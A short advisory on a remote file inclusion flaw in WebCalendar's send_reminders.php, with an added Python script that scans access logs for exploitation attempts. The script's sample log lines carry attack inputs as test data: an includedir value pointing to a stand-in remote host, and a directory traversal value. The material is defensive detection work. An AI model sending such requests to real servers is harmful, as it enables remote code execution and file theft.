WebCalendar < 1.0.1 send_reminders.php includedir Parameter Remote File Inclusion

High

Synopsis

The remote host is vulnerable to a script injection attack.

Description

The remote version of WebCalendar fails to sanitize user-supplied input to the 'includedir' parameter of the 'send_reminders.php' script. By leveraging this flaw, an attacker may be able to view arbitrary files on the remote host and execute arbitrary PHP code, possibly taken from third-party hosts.

Solution

Upgrade to version 1.0.1 or higher.
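
A log check for the flaw in the Description, added here as an example and not part of the original advisory: it scans web access logs for requests to send_reminders.php that supply an includedir query parameter and labels what the value points at. The combined log format, the /webcalendar/ path and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (combined log format, documentation addresses only).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /webcalendar/send_reminders.php HTTP/1.1" 200 512 "-" "cron"
198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /webcalendar/send_reminders.php?includedir=http%3A%2F%2Fexample.invalid%2F HTTP/1.1" 200 90 "-" "-"
198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /webcalendar/send_reminders.php?includedir=..%2F..%2Fetc HTTP/1.1" 200 90 "-" "-"
203.0.113.5 - - [01/Jan/2024:10:03:00 +0000] "GET /webcalendar/month.php?includedir=x HTTP/1.1" 200 90 "-" "-"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.I)

def classify(value):
    """Label a decoded includedir value by the kind of include target it names."""
    if SCHEME_RE.match(value) or value.startswith("//"):
        return "remote-or-wrapper"          # URL or stream-wrapper style target
    if ".." in value.replace("\\", "/").split("/"):
        return "traversal"                  # climbs out of the application directory
    if value.startswith("/"):
        return "absolute-path"
    return "other"

def find_includedir_requests(log_text):
    """Return (client, status, value, kind) for each request-supplied includedir."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue                        # not a parseable request line
        client, _method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/send_reminders.php"):
            continue                        # only the script named in the advisory
        # parse_qs percent-decodes values, so encoded payloads are classified too.
        for value in parse_qs(url.query, keep_blank_values=True).get("includedir", []):
            findings.append((client, status, value, classify(value)))
    return findings

if __name__ == "__main__":
    for client, status, value, kind in find_includedir_requests(SAMPLE_LOG):
        print(f"{client} status={status} kind={kind} includedir={value!r}")
```

Only the query string is inspected, because request bodies do not appear in access logs; any hit on a host running a version below 1.0.1 warrants review.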